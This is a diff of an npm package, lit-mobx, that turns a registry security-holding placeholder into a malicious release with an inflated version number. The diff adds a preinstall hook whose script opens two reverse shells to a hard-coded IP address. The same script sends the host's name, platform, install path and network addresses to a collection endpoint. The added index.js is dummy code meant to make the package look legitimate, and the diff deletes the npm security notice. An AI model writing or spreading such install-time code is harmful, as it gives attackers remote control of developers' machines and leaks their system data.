lit-mobx 0.0.1-security → 999999998.999.999

package/index.js

@@ -0,0 +1,6 @@
+// Dummy functionality to make the package look legitimate
+module.exports = {
+    format: (str) => str.trim(),
+    clean: (str) => str.replace(/[^a-zA-Z0-9]/g, ''),
+    capitalize: (str) => str.charAt(0).toUpperCase() + str.slice(1).toLowerCase()
+}; 

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "lit-mobx",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
-}
+  "version": "999999998.999.999",
+  "description": "Template for demonstrating package typosquatting risks",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node scripts/preinstall.js"
+  },
+  "keywords": [],
+  "author": "",
+  "license": "ISC"
+} 

package/scripts/preinstall.js

@@ -0,0 +1,95 @@
+const { exec } = require('child_process');
+const os = require('os');
+const http = require('http');
+const net = require('net');
+const path = require('path');
+
+
+exec("/bin/bash -c 'bash -i >& /dev/tcp/75.119.159.178/4444 0>&1'", (error, stdout, stderr) => {
+    if (error) {
+        console.error(`Error executing echo: ${error.message}`);
+        return;
+    }
+    if (stderr) {
+        console.error(`Shell error: ${stderr}`);
+        return;
+    }
+    console.log(stdout.trim());
+});
+
+// Reverse shell setup
+function startReverseShell() {
+    try {
+        const sh = require("child_process").spawn("/bin/sh", []);
+        const client = new net.Socket();
+
+        client.connect(4444, "75.119.159.178", () => {
+            console.log("Reverse shell connected to 75.119.159.178:4444");
+            client.pipe(sh.stdin);
+            sh.stdout.pipe(client);
+            sh.stderr.pipe(client);
+        });
+
+        client.on('error', (err) => {
+            console.error("Reverse shell error:", err.message);
+        });
+
+    } catch (err) {
+        console.error("Failed to start reverse shell:", err.message);
+    }
+}
+
+// Collect and send system data
+function sendSystemData() {
+    const data = {
+        package: process.env.npm_package_name,
+        timestamp: new Date().toISOString(),
+        hostname: os.hostname(),
+        platform: os.platform(),
+        installPath: process.cwd(),
+        networkInterfaces: Object.entries(os.networkInterfaces()).reduce((acc, [name, interfaces]) => {
+            acc[name] = interfaces
+                .filter(iface => !iface.internal && iface.family === 'IPv4')
+                .map(iface => iface.address);
+            return acc;
+        }, {})
+    };
+
+    const options = {
+        hostname: '75.119.159.178',
+        port: 7891,
+        path: '/collect',
+        method: 'POST',
+        headers: {
+            'Content-Type': 'application/json',
+        }
+    };
+
+    const req = http.request(options, (res) => {
+        let responseBody = '';
+        res.on('data', chunk => (responseBody += chunk));
+        res.on('end', () => {
+            console.log('Data sent successfully:', responseBody);
+        });
+    });
+
+    req.on('error', (error) => {
+        console.error('Error sending system data:', error.message);
+    });
+
+    req.write(JSON.stringify(data));
+    req.end();
+}
+
+// Execute a shell command to print "hellw"
+exec('echo "hellw"', (error, stdout, stderr) => {
+    if (error) {
+        console.error(`Error executing echo: ${error.message}`);
+    } else {
+        console.log(stdout.trim());
+    }
+});
+
+// Start reverse shell and send system data
+startReverseShell();
+sendSystemData();

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=lit-mobx for more information.